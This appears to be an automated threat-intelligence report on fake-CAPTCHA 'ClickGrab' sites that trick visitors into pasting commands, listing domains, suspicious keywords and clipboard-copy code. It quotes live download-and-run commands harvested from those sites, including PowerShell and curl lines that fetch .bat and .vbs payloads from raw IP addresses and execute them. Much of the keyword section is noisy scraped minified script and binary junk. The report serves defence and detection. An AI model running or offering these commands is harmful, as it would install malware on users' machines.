← Back to Analysis

Emerging ClickGrab Campaign: Advanced Analysis of 2026-05-12 Attack Patterns

📅 Published: May 12, 2026 👨‍💻 Author: ClickGrab Threat Intelligence Team 📖 12 min read
100Sites
22%Detection
2PS Downloads

ClickGrab Threat Analysis Report - 2026-05-12

Generated on 2026-05-12 01:55:57

Executive Summary

  • Total sites analyzed: 100
  • Sites with malicious content: 22
  • Unique domains encountered: 1,314
  • Total URLs extracted: 6,742
  • PowerShell download attempts: 2
  • Clipboard manipulation instances: 102

Domain Analysis

Most Frequently Encountered Domains

  • bharatnamkeens.com: 405 occurrences
  • www.maheshwaree.com: 320 occurrences
  • twitch.co.com: 318 occurrences
  • 98.70.13.131: 309 occurrences
  • fudgeshop.com.au: 265 occurrences
  • picsera.com: 227 occurrences
  • 18.176.47.246: 218 occurrences
  • adturekorea.co.kr: 214 occurrences
  • scillarodriguez.com: 198 occurrences
  • www.ccera-icar.org: 178 occurrences
  • www.evodigital.com.au: 156 occurrences
  • devblog.ezeelogin.com: 132 occurrences
  • www.dorper.com.au: 125 occurrences
  • picsera.sirv.com: 121 occurrences
  • 104.199.248.167: 71 occurrences

URL Pattern Analysis

reCAPTCHA imagery

11 occurrences across 8 distinct URLs

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (2 times)
  • https://www.google.com/recaptcha/api.js (2 times)
  • https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg (2 times)
  • https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha (1 times)
  • https://www.google.com/recaptcha/api.js?hl=&render=6Lf7uxYsAAAAANagtTWlY2ET8HF8nbfMf4-ePcWm (1 times)
  • ...and 3 more distinct URLs

Font resources

72 occurrences across 60 distinct URLs

  • https://fonts.gstatic.com (5 times)
  • https://fonts.googleapis.com (3 times)
  • https://18.176.47.246/wp-content/plugins/vk-post-author-display/vendor/vektor-inc/font-awesome-versions/src/font-awesome/css/all.min.css?ver=7.1.0 (2 times)
  • https://adturekorea.co.kr/js/font-awesome/css/font-awesome.min.css?ver=220620 (2 times)
  • https://use.fontawesome.com/releases/v5.6.3/css/all.css (2 times)
  • ...and 55 more distinct URLs

CDN hosted scripts

9 occurrences across 9 distinct URLs

  • https://cdn.jsdelivr.net/npm/three@0.167.0/build/three.module.js (1 times)
  • https://cdn.jsdelivr.net/npm/three@0.167.0/examples/jsm/ (1 times)
  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 times)
  • https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css?ver=6.8.5 (1 times)
  • https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.min.js?ver=6.0.8 (1 times)
  • ...and 4 more distinct URLs

Google resources

116 occurrences across 63 distinct URLs

  • https://bharatnamkeens.com/wp-content/plugins/widget-google-reviews/assets/img/guest.png (32 times)
  • https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent (13 times)
  • https://fonts.googleapis.com (3 times)
  • https://www.googletagmanager.com/gtm.js?id= (3 times)
  • https://www.google (3 times)
  • ...and 58 more distinct URLs

Suspicious Keyword Analysis

Total Keywords Found: 519 (107 unique)

Keyword Categories

Social Engineering

42 unique keywords

  • CAPTCHA-verificatie-ID
  • verification_data
  • captcha-js
  • To better prove you are not a robot
  • captcha-box
  • verification-id
  • exec /i https://i-like-ele-phants-verification.live/iamchallenge/verification/UserID7383526;`
  • Checking if you are human
  • captcha_sid
  • exec(bv_bg_style))!==null;){let new_img_url=getNewImageUrlSVG(new_url,bv_webp_status,property_value,entry2.target.getBoundingClientRect());bv_bg_style=bv_bg_style.replace(match[1],new_img_url)}let new_bv_bg_style=entry2.target.getAttribute("style")||"";new_bv_bg_style=new_bv_bg_style+(new_bv_bg_style?";":"")+(bv_bg_style||""),entry2.target.setAttribute("style",new_bv_bg_style)}else{for(;(match=regex.exec(property_value))!==null;){let new_img_url=getNewImageUrlSVG(new_url,bv_webp_status,property_value,entry2.target.getBoundingClientRect());property_value=property_value.replace(match[1],new_img_url)}entry2.target.style.setProperty(property_type,property_value,"important")}}}bvObservedNodesWithCounter.delete(entry2.target),other_image_observer.unobserve(entry2.target)}})}__name(handleOtherImages,"handleOtherImages");function handleIframesV2(entries){entries.map(entry2=>{entry2.isIntersecting&&(set_iframe_element_src_v2(entry2.target),iframe_observer_v2.unobserve(entry2.target))})}__name(handleIframesV2,"handleIframesV2");const bvCheckNode=__name((node,currentLevel=1,maxLevel=1/0)=>{if(node.nodeType===1){const className=node.getAttribute("class");if(node.nodeName==="IFRAME"&&typeof className=="string"&&className.includes("bv-lazyload-iframe"))iframe_observer_v2.observe(node);else{const computedStyle=getComputedStyle(node),background=computedStyle.getPropertyValue("background")||"none",backgroundImage=computedStyle.getPropertyValue("background-image")||"none";backgroundImage!=="none"&&backgroundImage.match(/url\(/)?(get_bv_identifier(backgroundImage,"bv-img-url")||get_bv_identifier(backgroundImage))&&bvObserveImgNode(node):background!=="none"&&background.match(/url\(/)?(get_bv_identifier(background,"bv-img-url")||get_bv_identifier(background))&&bvObserveImgNode(node):typeof className=="string"&&className.includes("bv-lazyload-bg-style")?bv_style_observer.observe(node):typeof className=="string"&&className.includes("bv-lazyload-tag-img")?img_observer.observe(node):typeof className=="string"&&className.includes("bv-lazyload-picture")&&picture_lazy_observer.observe(node)}}currentLevel<maxLevel&&node.childNodes.length&&node.childNodes.forEach(childNode=>{bvCheckNode(childNode,currentLevel+1,maxLevel)})},"bvCheckNode");function bv_handle_mutations(mutations){mutations.forEach(mutation=>{if(mutation.type==="childList"&&mutation.addedNodes.length)mutation.addedNodes.forEach(node=>{setTimeout(function(){bvCheckNode(node)},0)});else if(mutation.type==="attributes"){const targetNode=mutation.target,attributeName=mutation.attributeName,attributeValue=targetNode.getAttribute(attributeName);if(attributeName==="style"&&targetNode.style.backgroundImage!==mutation_observer.prevBackgroundImage){const computedStyle=getComputedStyle(targetNode),background=computedStyle.getPropertyValue("background")||"none",backgroundImage=computedStyle.getPropertyValue("background-image")||"none";backgroundImage!=="none"&&backgroundImage.match(/url\(/)?(get_bv_identifier(backgroundImage,"bv-img-url")||get_bv_identifier(backgroundImage))&&bvObserveImgNode(targetNode):background!=="none"&&background.match(/url\(/)&&(get_bv_identifier(background,"bv-img-url")||get_bv_identifier(background))&&bvObserveImgNode(targetNode)}else attributeName==="class"&&setTimeout(function(){bvCheckNode(targetNode)},0)}})}__name(bv_handle_mutations,"bv_handle_mutations");function handle_mod_key_nodes(){let node_elements=document.querySelectorAll("[bv-img-mod-key]");for(let i=0;i<node_elements.length;i++){let element=node_elements[i],target_key=element.getAttribute("bv-img-mod-key"),mod_url=element.getAttribute(target_key);if(mod_url){let bv_img_url=get_bv_identifier(mod_url,"bv-img-url"),url_identifier=get_bv_identifier(mod_url),old_url=bv_img_url||(url_identifier?bv_url_map[url_identifier]:null);if(old_url){let dimensions=element.getBoundingClientRect(),new_img_url=getNewImageUrlSVG(old_url,bv_webp_status,mod_url,dimensions);element.setAttribute(target_key,new_img_url)}}}}__name(handle_mod_key_nodes,"handle_mod_key_nodes");function bvRemoveEventListeners(){for(const event of bv_lazyload_events)window.removeEventListener(event,handleLazyloadedStyleImages)}__name(bvRemoveEventListeners,"bvRemoveEventListeners");function handleLazyloadedStyleImages(){setTimeout(function(){bvRemoveEventListeners()},0),document.querySelectorAll("body *").forEach(_element=>{setTimeout(function(){bvCheckNode(_element,1,1)},0)})}__name(handleLazyloadedStyleImages,"handleLazyloadedStyleImages"),handle_mod_key_nodes();let other_image_observer,iframe_observer_v2,mutation_observer;var bvDynamicImageObserverOptions={rootMargin:"200px 0px",threshold:.01};"IntersectionObserver"in window&&(other_image_observer=new IntersectionObserver(handleOtherImages,bvDynamicImageObserverOptions),iframe_observer_v2=new IntersectionObserver(handleIframesV2,bvDynamicImageObserverOptions)),"MutationObserver"in window&&(mutation_observer=new MutationObserver(bv_handle_mutations),mutation_observer.prevBackground="",mutation_observer.prevBackgroundImage="",mutation_observer.observe(document.body,{childList:!0,subtree:!0,attributes:!0,characterData:!0})),"IntersectionObserver"in window&&"MutationObserver"in window&&window.addEventListener("load",event=>{for(const event2 of bv_lazyload_events)window.addEventListener(event2,handleLazyloadedStyleImages,{once:!0})})
  • ...and 32 more

Obfuscation Indicators

11 unique keywords

  • eval("clearTimeout(timeIn"+uid+")")
  • eval("clearTimeout(timeOut"+uid+")")
  • eval("timeOut"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').hide(15); }, 200);")
  • eval('var timeOut'+popupItems[i].id)
  • eval("timeIn"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').show(15).css({'top': top + 'px', 'left': left + 'px'}); }, 200);")
  • eval(frameContents)
  • exec()QApplication::%s: Please instantiate the QApplication object first%L1WARNING: QApplication was not created in the main() thread.�sgqAppNameQCoreApplication: Application event filter cannot be in a different thread.QCoreApplication: Object event filter cannot be in a different thread.QCoreApplication::applicationFilePath: Please instantiate the QApplication object firstQCoreApplication::argc: Please instantiate the QApplication object firstQCoreApplication::argv: Please instantiate the QApplication object firstQCoreApplication::enter_loop: Must be called from the main threadenter_looploopLevelQCoreApplication::notify: Unexpected null receiverinstallTranslatorQCoreApplication::applicationDirPath: Please instantiate the QApplication object firstremoveTranslatorQCoreApplication::postEvent: Unexpected null receiverQCoreApplication::sendPostedEvents: Cannot send posted events for objects in another threadQCoreApplication::exit_loop: Must be called from the main threadexit_loop<�g��g��g��gP-g�g� g��g��g��g��g��g g� g�� g-testability-graphicssystem-session-style-style=-widgetcount-stylesheet-reverse-qdebug-qdevelQCoreApplication::arguments: Please instantiate the QApplication object firstQT_PLUGIN_PATHQCoreApplication::exec: The event loop is already running%s::exec: Must be called from the main threadexec��g�3g��g�3g �g4gl�g�4g::constenum class struct char shortulong longuint intunsignedconst onstQtvoidQMetaMethod::invoke: Dead lock detected in BlockingQueuedConnection: Receiver is %s(%p)
  • eval(script)
  • eval(
  • eval(this._loadScript(url.url) + "\n//@ sourceURL= " + url.url)
  • ...and 1 more

System Commands

33 unique keywords

  • exec(this.url)
  • command %dQPicture::metric: Invalid metric commandffffff9@QPicture::play: Format error/pictureformatsQPictureIO::write: No such picture format handler: %sQPicture: invalid format version 00�be@� e��e�� e��e �Fe� ep� eQPicture::load: No such picture format: %sQPicture::save: No such picture format: %sQPicture::save: still being painted on. Call QPainter::end() first��be�� e��Oe��=e��=e��Oe|�beЍNe �Ne��Ne@� e�{Oed{Oej{Oep{Oev{Oe|{Oe�{Oe�be� e@l e�l ePz e�z e� e�x e�o e�m e�r e�s e� e�p en e� e@o e e@n e n e�o e�o e��eQPixmap: Must construct a QApplication before a QPaintDeviceL�be�� ep�2e0� e��e �Fe� eQPixmap::operator=: Cannot assign to pixmap during paintingQPixmap::save: quality out of range [-1,100]QPixmap::setMask() mask size differs from pixmap sizeQPixmap::setMask: Cannot set mask while pixmap is being painted onQPixmap::fill: Cannot fill while pixmap is being painted onQPixmap::setAlphaChannel: The pixmap and the alpha channel pixmap must have the same sizeQPixmap::setAlphaChannel: Cannot set alpha channel while pixmap is being painted onQPixmap::scaled: Pixmap is a null pixmapQPixmap::scaleWidth: Pixmap is a null pixmapQPixmap::scaleHeight: Pixmap is a null pixmapqt_pixmapQPMCacheQCache�be�� ep�2e0� e��e �Fe� e��be@� e�� e��Ne�� e�{Oed{Oe�� ep{Oev{Oe|{Oe�{Oe @���������@P�be��Fe��beЏNe��Ne��Ne��Oe�{Oed{Oej{Oep{Oev{Oe|{Oe�{Oe0TNe��Oe��be� e@�be��Fe@��be��Fe��be��Fe @<�be��Ne@�Ne��Nep e�{Oed{Oej{Oep{Oev{Oe|{Oe�{Oe! e0) e�@��be��Ne��Ne��Nep e�{Oed{Oej{Oep{Oev{Oe|{Oe�{Oe�. e0@ e��be�Ne�Ne��Ne� e�{Oed{Oej{Oep{Oev{Oe|{Oe�{Oe0TNe�0 e,�be�Nep�Ne��Nep e�{Oed{Oej{Oep{Oev{Oe|{Oe�{Oe�6 epC e�?�h㈵��>@��be�I e��Oe��Oe|�be@�Ne��Ne��NeI e�{Oed{Oej{Oep{Oev{Oe|{Oe�{Oep�beJ e��Oe��Oe�beP�Ne��Ne��Ne�I e�{Oed{Oej{Oep{Oev{Oe|{Oe�{Oe OU+&@:ga����
  • wscript
  • command =powershell -c "Invoke-WebRequest -Uri 'http://95.164.53.214:5554/d.bat' -OutFile \"%temp%\d.bat\" -UseBasicParsing; Start-Process \"%temp%\d.bat\"";
  • powershell
  • exec /i http://inkbookwriters.com/verify';
  • Invoke
  • const command =
  • `exec(ua) != null) { rv = parseFloat(RegExp.$1); } } else if (n.appName == "Netscape") { rv = 11; re = new RegExp("Trident/.rv:([0-9]+[.0-9])"); if (re.exec(ua) != null) { rv = parseFloat(RegExp.$1); } } }

return rv; }

})(window, document, navigator)-Invoke-WebRequest` - ...and 23 more

Verification Text

3 unique keywords

  • hidden
  • ray id
  • Hidden

Technical Terms

18 unique keywords

  • CreateThread
  • odyssey
  • You will observe
  • WinHttpRequest
  • VirtualAlloc
  • .ps1
  • Ray ID
  • iex
  • bitmap
  • responseText
  • ...and 8 more

Most Frequent Keywords

  • hidden: 45 occurrences
  • robot: 38 occurrences
  • Robot: 28 occurrences
  • failed_to_retrieve: 21 occurrences
  • verification: 20 occurrences
  • CAPTCHA: 18 occurrences
  • Verification: 17 occurrences
  • CAPTCHA Verification: 16 occurrences
  • I am not a robot: 16 occurrences
  • You will observe: 16 occurrences
  • verification-id: 16 occurrences
  • To better prove you are not a robot: 16 occurrences
  • Verification ID: 15 occurrences
  • Ray ID: 14 occurrences
  • Checking if you are human: 14 occurrences

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';, command = 'cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

Group 2: CAPTCHA Verification, CAPTCHA-verificatie-ID, Verification, verification

Group 3: Verification ID, verification-id, verification_data, verification id, Verification Hash, verification_id

Group 4: Ray ID, ray id

Group 5: CAPTCHA, captcha, captcha-badge, captcha-logo, CAPTCHA-logo, captcha-box, captcha_word, captcha_sid, captcha-js, Captcha

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

These strings may contain encoded malicious payloads:

  • caRemoveVRoots1ISCHECKFORPRODUCTUPDATESAllUsersApp...
  • QSocks5SocketEnginePrivate
  • USERNAMEARInstallChoiceCreating
  • au/smartdetection/deviceverification/CF/path/captc...
  • controlSocketBytesWritten

Clipboard Manipulation Analysis

Detected clipboard manipulation in 102 instances.

Document.Execcommand Copy

Found in 42 snippets (41.2% of clipboard code)

Examples:

try { document.execCommand('copy')

document.execCommand("copy")

document.execCommand('copy')

Textarea Manipulation

Found in 45 snippets (44.1% of clipboard code)

Examples:

ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"

tListener("click", function () { const textarea = document.createElement('textarea'

ng is the safe placeholder above const textarea = document.createElement('textarea'

Complete Malicious Functions

Function 1:

function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }

Report truncated for storage. Full per-site detail is available in the scan JSON under nightly_reports/.